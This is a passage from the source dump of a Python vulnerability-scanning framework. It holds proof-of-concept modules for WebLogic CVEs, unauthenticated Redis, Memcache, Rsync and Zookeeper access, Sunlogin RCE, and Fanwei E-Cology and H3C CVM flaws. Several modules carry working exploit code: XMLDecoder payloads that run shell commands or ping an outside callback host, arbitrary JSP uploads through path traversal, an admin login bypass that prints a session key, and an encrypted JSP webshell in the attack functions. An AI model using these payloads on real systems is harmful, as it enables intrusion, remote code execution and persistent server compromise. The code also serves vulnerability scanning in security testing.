{0}'.format(urllib.parse.urljoin(url, '/tomcat/test.jsp'))) 70 | print('[*] 密码: pocbomber') 71 | return True 72 | return False 73 | except: 74 | return False 75 | 76 | 77 | -------------------------------------------------------------------------------- /pocs/middleware/weblogic/CVE_2014_4210.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | 4 | 5 | import requests 6 | from urllib.parse import urlparse 7 | import time, re, socket 8 | def weblogic_fingerprint(url): # weblogic版本指纹 9 | oH = urlparse(url) 10 | a = oH.netloc.split(':') 11 | port = 80 12 | if 2 == len(a): 13 | port = a[1] 14 | elif 'https' in oH.scheme: 15 | port = 443 16 | host = a[0] 17 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 18 | sock.settimeout(3) 19 | server_address = (str(host), int(port)) 20 | sock.connect(server_address) 21 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 22 | time.sleep(1) 23 | try: 24 | version = (re.findall(r'HELO:(.*?).false', sock.recv(1024).decode()))[0] 25 | if version: 26 | return True 27 | else: 28 | return False 29 | except: 30 | return False 31 | 32 | def islive(ur,port): 33 | url='http://' + str(ur)+':'+str(port)+'/uddiexplorer/' 34 | r = requests.get(url, timeout=5) 35 | return r.status_code 36 | 37 | def run(url,port): 38 | if islive(url,port)==200: 39 | u='http://' + str(url)+':'+str(port)+'/uddiexplorer/' 40 | return True 41 | else: 42 | return False 43 | 44 | def verify(url): 45 | relsult = { 46 | 'name': 'CVE_2014_4210(weblogic)', 47 | 'vulnerable': False 48 | } 49 | try: 50 | if weblogic_fingerprint(url) is not True: 51 | return relsult 52 | oH = urlparse(url) 53 | a = oH.netloc.split(':') 54 | port = 80 55 | if 2 == len(a): 56 | port = a[1] 57 | elif 'https' in oH.scheme: 58 | port = 443 59 | host = a[0] 60 | if run(host, port): 61 | relsult['vulnerable'] = True 62 | relsult['url'] = url 63 | relsult['about'] = 'https://github.com/rabbitmask/WeblogicScan/blob/master/poc/CVE_2014_4210.py' 64 | return relsult 65 | except: 66 | return relsult 67 | 68 | -------------------------------------------------------------------------------- /pocs/middleware/weblogic/CVE_2017_10271.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import requests 5 | import re, socket 6 | from urllib.parse import urlparse 7 | import time, re 8 | def weblogic_fingerprint(url): # weblogic版本指纹 9 | oH = urlparse(url) 10 | a = oH.netloc.split(':') 11 | port = 80 12 | if 2 == len(a): 13 | port = a[1] 14 | elif 'https' in oH.scheme: 15 | port = 443 16 | host = a[0] 17 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 18 | sock.settimeout(3) 19 | server_address = (str(host), int(port)) 20 | sock.connect(server_address) 21 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 22 | time.sleep(1) 23 | try: 24 | version = (re.findall(r'HELO:(.*?).false', sock.recv(1024).decode()))[0] 25 | if version: 26 | return True 27 | else: 28 | return False 29 | except: 30 | return False 31 | 32 | VUL=['CVE-2017-10271'] 33 | 34 | 35 | def poc(u): 36 | url = "http://" + u 37 | url += '/wls-wsat/CoordinatorPortType' 38 | post_str = ''' 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | /usr/sbin/ping 47 | 48 | 49 | ceye.com 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | ''' 60 | headers = { 61 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 62 | 'Content-Type': 'application/x-www-form-urlencoded', 63 | } 64 | try: 65 | response = requests.post(url, data=post_str, verify=False, timeout=5, headers=headers) 66 | response = response.text 67 | response = re.search(r"\.*\<\/faultstring\>", response).group(0) 68 | except Exception: 69 | response = "" 70 | 71 | if 'java.lang.ProcessBuilder' in response or "0" in response: 72 | return True 73 | else: 74 | return False 75 | 76 | 77 | def run(rip,rport): 78 | url=rip+':'+str(rport) 79 | return poc(url) 80 | def verify(url): 81 | relsult = { 82 | 'name': 'CVE_2017_10271(weblogic)', 83 | 'vulnerable': False 84 | } 85 | try: 86 | if weblogic_fingerprint(url) is not True: 87 | return relsult 88 | oH = urlparse(url) 89 | a = oH.netloc.split(':') 90 | port = 80 91 | if 2 == len(a): 92 | port = a[1] 93 | elif 'https' in oH.scheme: 94 | port = 443 95 | host = a[0] 96 | if run(host, port): 97 | relsult['vulnerable'] = True 98 | relsult['url'] = url 99 | relsult['about'] = 'https://github.com/rabbitmask/WeblogicScan/blob/master/poc/CVE_2017_10271.py' 100 | return relsult 101 | except: 102 | return relsult 103 | -------------------------------------------------------------------------------- /pocs/middleware/weblogic/CVE_2017_3506.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import requests 5 | import re, socket 6 | from urllib.parse import urlparse 7 | import time 8 | def weblogic_fingerprint(url): # weblogic版本指纹 9 | oH = urlparse(url) 10 | a = oH.netloc.split(':') 11 | port = 80 12 | if 2 == len(a): 13 | port = a[1] 14 | elif 'https' in oH.scheme: 15 | port = 443 16 | host = a[0] 17 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 18 | sock.settimeout(3) 19 | server_address = (str(host), int(port)) 20 | sock.connect(server_address) 21 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 22 | time.sleep(1) 23 | try: 24 | version = (re.findall(r'HELO:(.*?).false', sock.recv(1024).decode()))[0] 25 | if version: 26 | return True 27 | else: 28 | return False 29 | except: 30 | return False 31 | 32 | VUL=['CVE-2017-3506'] 33 | headers = {'user-agent': 'ceshi/0.0.1'} 34 | 35 | def poc(u): 36 | url = "http://" + u 37 | url += '/wls-wsat/CoordinatorPortType' 38 | post_str = ''' 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | /bin/bash 47 | 48 | 49 | -c 50 | 51 | 52 | whoami 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | ''' 63 | 64 | try: 65 | response = requests.post(url, data=post_str, verify=False, timeout=5, headers=headers) 66 | response = response.text 67 | response = re.search(r"\.*\<\/faultstring\>", response).group(0) 68 | except Exception: 69 | response = "" 70 | 71 | if 'java.lang.ProcessBuilder' in response or "0" in response: 72 | return True 73 | else: 74 | return False 75 | 76 | 77 | 78 | def run(rip,rport): 79 | url=rip+':'+str(rport) 80 | return poc(url) 81 | def verify(url): 82 | relsult = { 83 | 'name': 'CVE_2017_3506(weblogic)', 84 | 'vulnerable': False 85 | } 86 | try: 87 | if weblogic_fingerprint(url) is not True: 88 | return relsult 89 | oH = urlparse(url) 90 | a = oH.netloc.split(':') 91 | port = 80 92 | if 2 == len(a): 93 | port = a[1] 94 | elif 'https' in oH.scheme: 95 | port = 443 96 | host = a[0] 97 | if run(host, port): 98 | relsult['vulnerable'] = True 99 | relsult['url'] = url 100 | relsult['about'] = 'https://github.com/rabbitmask/WeblogicScan/blob/master/poc/CVE_2017_3506.py' 101 | return relsult 102 | except: 103 | return relsult 104 | -------------------------------------------------------------------------------- /pocs/middleware/weblogic/CVE_2018_2894.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import requests, socket 5 | from urllib.parse import urlparse 6 | import time, re 7 | def weblogic_fingerprint(url): # weblogic版本指纹 8 | oH = urlparse(url) 9 | a = oH.netloc.split(':') 10 | port = 80 11 | if 2 == len(a): 12 | port = a[1] 13 | elif 'https' in oH.scheme: 14 | port = 443 15 | host = a[0] 16 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | sock.settimeout(3) 18 | server_address = (str(host), int(port)) 19 | sock.connect(server_address) 20 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 21 | time.sleep(1) 22 | try: 23 | version = (re.findall(r'HELO:(.*?).false', sock.recv(1024).decode()))[0] 24 | if version: 25 | return True 26 | else: 27 | return False 28 | except: 29 | return False 30 | 31 | VUL=['CVE-2018-2894'] 32 | 33 | 34 | def islive(ur,port): 35 | headers = { 36 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 37 | 'Content-Type': 'application/x-www-form-urlencoded', 38 | } 39 | url='http://' + str(ur)+':'+str(port)+'/ws_utc/begin.do' 40 | r1 = requests.get(url, headers=headers, timeout=10) 41 | url='http://' + str(ur)+':'+str(port)+'/ws_utc/config.do' 42 | r2 = requests.get(url, headers=headers, timeout=10) 43 | return r1.status_code,r2.status_code 44 | 45 | def run(rip,rport): 46 | a,b=islive(rip,rport) 47 | if a == 200 or b == 200: 48 | return True 49 | else: 50 | return False 51 | def verify(url): 52 | relsult = { 53 | 'name': 'CVE_2018_2894(weblogic)', 54 | 'vulnerable': False 55 | } 56 | try: 57 | if weblogic_fingerprint(url) is not True: 58 | return relsult 59 | oH = urlparse(url) 60 | a = oH.netloc.split(':') 61 | port = 80 62 | if 2 == len(a): 63 | port = a[1] 64 | elif 'https' in oH.scheme: 65 | port = 443 66 | host = a[0] 67 | if run(host, port): 68 | relsult['vulnerable'] = True 69 | relsult['url'] = url 70 | relsult['about'] = 'https://github.com/rabbitmask/WeblogicScan/blob/master/poc/CVE_2018_2894.py' 71 | return relsult 72 | except: 73 | return relsult 74 | 75 | -------------------------------------------------------------------------------- /pocs/middleware/weblogic/CVE_2020_14882.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | import socket, time 4 | from urllib.parse import urlparse 5 | 6 | def weblogic_fingerprint(url): # weblogic版本指纹 7 | oH = urlparse(url) 8 | a = oH.netloc.split(':') 9 | port = 80 10 | if 2 == len(a): 11 | port = a[1] 12 | elif 'https' in oH.scheme: 13 | port = 443 14 | host = a[0] 15 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16 | sock.settimeout(3) 17 | server_address = (str(host), int(port)) 18 | sock.connect(server_address) 19 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 20 | time.sleep(1) 21 | try: 22 | version = (re.findall(r'HELO:(.*?).false', sock.recv(1024).decode()))[0] 23 | if version: 24 | return True 25 | else: 26 | return False 27 | except: 28 | return False 29 | 30 | def verify(url): 31 | relsult = { 32 | 'name': 'Weblogic未授权远程命令执行漏洞(CVE-2020-14882&CVE-2020-14883)', 33 | 'vulnerable': False 34 | } 35 | path = "/console/css/%252e%252e%252fconsole.portal" 36 | headers = { 37 | 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36', 38 | "Content-Type": "application/x-www-form-urlencoded" 39 | } 40 | 41 | try: 42 | if weblogic_fingerprint(url) is not True: 43 | return relsult 44 | vulurl = urllib.parse.urljoin(url, path) 45 | session = requests.session() 46 | req1 = session.get(vulurl, headers=headers, timeout=5, verify=False, allow_redirects=False) 47 | if req1.status_code == 302 and "ADMINCONSOLESESSION" in req1.headers["Set-Cookie"]: 48 | req2 = session.get(vulurl, headers=headers, timeout=5, verify=False, allow_redirects=False) 49 | if req2.status_code == 200: 50 | relsult['vulnerable'] = True 51 | relsult['url'] = url 52 | relsult['vurl'] = vulurl 53 | relsult['about'] = 'http://www.javashuo.com/article/p-glmljccr-oa.html, https://www.cnblogs.com/liliyuanshangcao/p/13962160.html' 54 | return relsult 55 | except: 56 | return relsult 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | -------------------------------------------------------------------------------- /pocs/middleware/weblogic/CVE_2020_2551.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | import socket 5 | from urllib.parse import urlparse 6 | import time, re 7 | def weblogic_fingerprint(url): # weblogic版本指纹 8 | oH = urlparse(url) 9 | a = oH.netloc.split(':') 10 | port = 80 11 | if 2 == len(a): 12 | port = a[1] 13 | elif 'https' in oH.scheme: 14 | port = 443 15 | host = a[0] 16 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | sock.settimeout(3) 18 | server_address = (str(host), int(port)) 19 | sock.connect(server_address) 20 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 21 | time.sleep(1) 22 | try: 23 | version = (re.findall(r'HELO:(.*?).false', sock.recv(1024).decode()))[0] 24 | if version: 25 | return True 26 | else: 27 | return False 28 | except: 29 | return False 30 | 31 | """ 32 | only check CVE-2020-2551 vuls 33 | Twitter: @Hktalent3135773 34 | Creator: 51pwn_com 35 | Site: https://51pwn.com 36 | How use: 37 | python3 CVE-2020-2551.py -u http://192.168.26.79:7001 38 | # 32 Thread check 39 | cat allXXurl.txt|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|python3 CVE-2020-2551.py -e 40 | """ 41 | 42 | 43 | def doSendOne(ip,port,data): 44 | sock=None 45 | res=None 46 | try: 47 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 48 | sock.settimeout(7) 49 | server_addr = (ip, int(port)) 50 | sock.connect(server_addr) 51 | sock.send(data) 52 | res = sock.recv(20) 53 | if b'GIOP' in res: 54 | return True 55 | except Exception as e: 56 | pass 57 | finally: 58 | if sock!=None: 59 | sock.close() 60 | return False 61 | 62 | def doOne(url): 63 | oH=urlparse(url) 64 | a=oH.netloc.split(':') 65 | port=80 66 | if 2 == len(a): 67 | port=a[1] 68 | elif 'https' in oH.scheme: 69 | port=443 70 | if doSendOne(a[0],port,bytes.fromhex('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')): 71 | return True 72 | else: 73 | return False 74 | def verify(url): 75 | relsult = { 76 | 'name': 'CVE_2020_2551(weblogic)', 77 | 'vulnerable': False 78 | } 79 | try: 80 | if weblogic_fingerprint(url) is not True: 81 | return relsult 82 | if doOne(url): 83 | relsult['vulnerable'] = True 84 | relsult['url'] = url 85 | relsult['about'] = 'https://github.com/rockmelodies/CVE-2020-2551' 86 | return relsult 87 | except: 88 | return relsult 89 | 90 | 91 | -------------------------------------------------------------------------------- /pocs/ports/memcache_unauth_11211.py: -------------------------------------------------------------------------------- 1 | import socket 2 | from urllib.parse import urlparse 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': 'Memcahe 未授权访问', 7 | 'url': url, 8 | 'port': 11211, 9 | 'vulnerable': False, 10 | 'attack': False, 11 | 'about': 'https://blog.csdn.net/chest_/article/details/105808673, https://blog.csdn.net/qq_23936389/article/details/81256118', 12 | } 13 | timeout = 3 14 | oH = urlparse(url) 15 | a = oH.netloc.split(':') 16 | port = relsult['port'] # memcache默认端口 17 | host = a[0] 18 | if is_open(host, port): 19 | pass 20 | else: 21 | return relsult 22 | payload = b'stats\r\n' # 发送的数据 23 | s = socket.socket() 24 | socket.setdefaulttimeout(timeout) # 设置超时时间 25 | try: 26 | s.connect((host, int(port))) 27 | s.send(payload) # 发送info命令 28 | response = s.recv(1024).decode() 29 | s.close() 30 | if response and 'STAT version' in response: 31 | relsult['vulnerable'] = True 32 | return relsult 33 | except: 34 | return relsult 35 | 36 | def is_open(host, port): 37 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 38 | try: 39 | s.settimeout(1.5) 40 | s.connect((host, int(port))) 41 | s.shutdown(2) 42 | return True 43 | except: 44 | return False -------------------------------------------------------------------------------- /pocs/ports/redis_6379.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import re 3 | from threading import Thread 4 | from queue import Queue 5 | from time import sleep, time 6 | from urllib.parse import urlparse 7 | 8 | def is_ip(url): 9 | if re.match(r"^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$", url): 10 | return True 11 | else: 12 | return False 13 | 14 | def is_open(host, port): 15 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16 | try: 17 | s.settimeout(1) 18 | s.connect((host, int(port))) 19 | s.shutdown(2) 20 | return True 21 | except: 22 | return False 23 | 24 | def verify(url): 25 | relsult = { 26 | 'name': 'Redis 4.x/5.x 未授权访问漏洞', 27 | 'vulnerable': False 28 | } 29 | oH = urlparse(url) 30 | a = oH.netloc.split(':') 31 | port = 6379 # redis默认端口是6379 32 | host = a[0] 33 | if is_open(host, port) is False: # 端口未开放直接退出 34 | return relsult 35 | if url: 36 | payload = b'*1\r\n$4\r\ninfo\r\n' # 发送的数据 37 | s = socket.socket() 38 | socket.setdefaulttimeout(3) # 设置超时时间 39 | try: 40 | s.connect((host, int(port))) 41 | s.send(payload) # 发送info命令 42 | response = s.recv(1024).decode() 43 | s.close() 44 | 45 | if response and 'redis_version' in response: 46 | relsult['vulnerable'] = True 47 | relsult['url'] = url 48 | relsult['port'] = port 49 | relsult['about'] = 'https://github.com/vulhub/redis-rogue-getshell' 50 | return relsult 51 | except (socket.error, socket.timeout): 52 | return relsult 53 | 54 | return relsult 55 | 56 | 57 | 58 | def create_queue(file_name): 59 | """ 60 | 创建数据队列 61 | argument: file_name -> 输入文件名 62 | return: data,total 数据队列,数据总数 63 | """ 64 | total = 0 65 | data = Queue() 66 | for line in open(file_name): 67 | url = line.strip() 68 | if url: 69 | # 跳过空白的行 70 | data.put(url) 71 | total += 1 72 | 73 | data.put(None) # 结束标记 74 | return data, total 75 | 76 | 77 | def start_jobs(data, num): 78 | """ 79 | 启动所有工作线程 80 | argument: data -> 数据队列 num -> 线程数 81 | """ 82 | is_alive = [True] 83 | 84 | def job(): 85 | """工作线程""" 86 | while is_alive[0]: 87 | try: 88 | url = data.get() 89 | if url == None: 90 | # 遇到结束标记 91 | break 92 | code, result = verify(url) # 验证漏洞 93 | if code: 94 | print(result) # 存在漏洞 95 | except: 96 | is_alive[0] = False 97 | data.put(None) # 结束标记 98 | 99 | jobs = [Thread(target=job) for i in range(num)] # 创建多个线程 100 | for j in jobs: 101 | j.setDaemon(True) 102 | j.start() # 启动线程 103 | 104 | for j in jobs: 105 | j.join() # 等待线程退出 106 | 107 | 108 | def main(): 109 | file_name = input('输入文件路径:') # 输入文件 110 | num = int(input('输入执行的线程:')) # 线程数 111 | data, total = create_queue(file_name) # 创建数据队列 112 | print('total: %s' % total) 113 | begin = time() 114 | start_jobs(data, num) # 启动工作线程 115 | end = time() 116 | print('spent %ss' % str(end - begin)) 117 | 118 | -------------------------------------------------------------------------------- /pocs/ports/rsync_unauth_873.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import re 3 | from urllib.parse import urlparse 4 | 5 | def is_open(host, port): 6 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 7 | try: 8 | s.settimeout(1.5) 9 | s.connect((host, int(port))) 10 | s.shutdown(2) 11 | return True 12 | except: 13 | return False 14 | 15 | def verify(url): 16 | relsult = { 17 | 'name': 'Rsync 未授权访问', 18 | 'vulnerable': False, 19 | 'url': url, 20 | 'port': 873, 21 | 'about': 'https://www.freebuf.com/articles/web/317695.html', 22 | } 23 | timeout = 3 24 | oH = urlparse(url) 25 | a = oH.netloc.split(':') 26 | port = relsult['port'] # rsync默认端口 27 | host = a[0] 28 | if is_open(host, port): 29 | pass 30 | else: 31 | return relsult 32 | payload = b'' # 发送的数据 33 | s = socket.socket() 34 | socket.setdefaulttimeout(timeout) # 设置超时时间 35 | try: 36 | s.connect((host, int(port))) 37 | s.send(payload) # 发送info命令 38 | response = s.recv(1024).decode() 39 | s.close() 40 | if response and '@RSYNCD' in response: 41 | relsult['vulnerable'] = True 42 | return relsult 43 | except: 44 | return relsult 45 | -------------------------------------------------------------------------------- /pocs/ports/sunlogin_rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': '向日葵 11.0.0.33162 远程命令执行(CNVD-2022-10270)', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | } 11 | 12 | try: 13 | rep = requests.get(url, timeout=3) 14 | if re.search('Verification failure', rep.text): 15 | vurl = urllib.parse.urljoin(url, '/cgi-bin/rpc?action=verify-haras') 16 | rep2 = requests.get(vurl, timeout=3) 17 | cid = re.findall('"verify_string":"([^"]+)"', rep2.text)[0] 18 | relsult['vulnerable'] = True 19 | relsult['url'] = url 20 | relsult['payload'] = vurl 21 | relsult['cid'] = cid 22 | relsult['about'] = 'https://github.com/Mr-xn/sunlogin_rce' 23 | return relsult 24 | else: 25 | return relsult 26 | except: 27 | return relsult 28 | 29 | -------------------------------------------------------------------------------- /pocs/ports/zookeeper_unauthorized.py: -------------------------------------------------------------------------------- 1 | import socket 2 | from urllib.parse import urlparse 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': 'Zookeeper未授权访问', 7 | 'url': url, 8 | 'vulnerable': False, 9 | 'attack': False, 10 | 'about': 'https://www.cnblogs.com/stuka/p/14716926.html', 11 | } 12 | timeout = 3 13 | oH = urlparse(url) 14 | host = oH.netloc.split(':')[0] 15 | port1 = 2181 16 | port2 = 2182 17 | if is_open(host, port1) or is_open(host, port2): 18 | pass 19 | else: 20 | return relsult 21 | try: 22 | if check(host, port1, timeout): 23 | relsult['vulnerable'] = True 24 | relsult['port'] = port1 25 | if check(host, port2, timeout): 26 | relsult['vulnerable'] = True 27 | relsult['port'] = port2 28 | return relsult 29 | except: 30 | return relsult 31 | 32 | 33 | def check(ip, port, timeout): 34 | try: 35 | socket.setdefaulttimeout(timeout) 36 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 37 | s.connect((ip, int(port))) 38 | flag = b'envi' 39 | s.send(flag) 40 | data = s.recv(1024) 41 | s.close() 42 | if 'Environment' in str(data): 43 | return True 44 | except: 45 | return False 46 | 47 | def is_open(host, port): 48 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 49 | try: 50 | s.settimeout(1.5) 51 | s.connect((host, int(port))) 52 | s.shutdown(2) 53 | return True 54 | except: 55 | return False -------------------------------------------------------------------------------- /pocs/redteam/fanwei_e-cology_uploadOperation_fileupload_2022.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib, random, string 4 | 5 | def verify(url): 6 | result = { 7 | 'name': '泛微OA E-Cology uploadOperation.jsp 任意文件上传(2022HVV)', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | 'about': 'http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20uploadOperation.jsp%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.html' 11 | } 12 | headers = { 13 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15', 14 | 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary6XgyjB6SeCArD3Hc', 15 | } 16 | randstr1 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 17 | randstr2 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 18 | filename = 'test.jsp' 19 | shell = f'<% out.println("{randstr1}" + "{randstr2}"); %>' 20 | # shell = '''<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>''' 21 | timeout = 3 22 | vurl = urllib.parse.urljoin(url, '/page/exportImport/uploadOperation.jsp') 23 | payload_data = '''------WebKitFormBoundary6XgyjB6SeCArD3Hc\r\nContent-Disposition: form-data; name="file"; filename="{0}"\r\nContent-Type: application/octet-stream\r\n\r\n{1}\r\n------WebKitFormBoundary6XgyjB6SeCArD3Hc--'''.format(filename, shell) 24 | verify_url = urllib.parse.urljoin(url, '/page/exportImport/fileTransfer/' + filename) 25 | try: 26 | rep = requests.post(vurl, timeout=timeout, verify=False, headers=headers, data=payload_data) 27 | verify_rep = requests.get(vurl, timeout=timeout, verify=False, headers=headers, data=payload_data) 28 | if verify_rep.status_code == 200 and re.search(randstr1 + randstr2, rep.text): 29 | result['vulnerable'] = True 30 | result['verify'] = verify_url 31 | return result 32 | except: 33 | return result 34 | 35 | def attack(url): 36 | headers = { 37 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15', 38 | 'Content-Type': 'application/x-www-form-urlencoded', 39 | } 40 | timeout = 3 41 | vurl = urllib.parse.urljoin(url, '/mobile/plugin/VerifyQuickLogin.jsp') 42 | payload_data = 'identifier=1&language=1&ipaddress=x.x.x.x' 43 | try: 44 | 45 | return True 46 | except: 47 | return False -------------------------------------------------------------------------------- /pocs/redteam/fanwei_e-cology_verifyquicklogin_loginbypass_2022.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib, json 4 | 5 | def verify(url): 6 | result = { 7 | 'name': '泛微OA E-Cology VerifyQuickLogin.jsp 任意管理员登录漏洞(2022HVV)', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | 'about': 'http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html' 11 | } 12 | headers = { 13 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15', 14 | 'Content-Type': 'application/x-www-form-urlencoded', 15 | } 16 | timeout = 3 17 | vurl = urllib.parse.urljoin(url, '/mobile/plugin/VerifyQuickLogin.jsp') 18 | payload_data = 'identifier=1&language=1&ipaddress=x.x.x.x' 19 | try: 20 | rep = requests.get(vurl, timeout=timeout, verify=False, headers=headers, data=payload_data) 21 | json_rep = json.loads(rep.text) 22 | if len(json_rep['sessionkey']) > 0 and json_rep['message'] == "1": 23 | result['vulnerable'] = True 24 | result['sessionkey'] = json_rep['sessionkey'] 25 | return result 26 | except: 27 | return result 28 | 29 | def attack(url): 30 | headers = { 31 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15', 32 | 'Content-Type': 'application/x-www-form-urlencoded', 33 | } 34 | timeout = 3 35 | vurl = urllib.parse.urljoin(url, '/mobile/plugin/VerifyQuickLogin.jsp') 36 | payload_data = 'identifier=1&language=1&ipaddress=x.x.x.x' 37 | try: 38 | rep = requests.get(vurl, timeout=timeout, verify=False, headers=headers, data=payload_data) 39 | json_rep = json.loads(rep.text) 40 | print('[*] 获取到sessionkey', json_rep['sessionkey']) 41 | return True 42 | except: 43 | return False -------------------------------------------------------------------------------- /pocs/redteam/h3c_cvm_fileupload_2022.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re, time 3 | import urllib, random, string 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'H3C CVM 前台任意文件上传漏洞(2022HVV) ', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | 'url': url, 11 | 'about': 'https://mp.weixin.qq.com/s/Oqo-8D6sQltVfq2RfbQdfw', 12 | } 13 | randstr1 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 14 | randstr2 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 15 | shell = f'<% out.println("{randstr1}" + "{randstr2}"); %>' 16 | filename = ''.join(random.sample(string.digits + string.ascii_letters, 5)) + '.jsp' 17 | payload = '/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/{0}&name=222'.format(filename) 18 | timeout = 5 19 | headers = { 20 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15', 21 | 'Content-Range': 'bytes 0-10/20', 22 | } 23 | vurl = urllib.parse.urljoin(url, payload) 24 | data = '{0}'.format(shell) 25 | verify_url = urllib.parse.urljoin(url, '/cas/js/lib/buttons/' + filename) 26 | try: 27 | rep = requests.post(vurl, headers=headers, timeout=timeout, data=data, verify=False) 28 | if rep.status_code == 200 and re.search('success', rep.text): 29 | rep2 = requests.get(verify_url, timeout=timeout, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}, verify=False) 30 | if rep2.status_code == 200 and re.search(randstr1 + randstr2, rep2.text): 31 | relsult['vulnerable'] = True 32 | relsult['verify'] = verify_url 33 | return relsult 34 | except: 35 | return relsult 36 | 37 | def attack(url): 38 | shell = '<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new 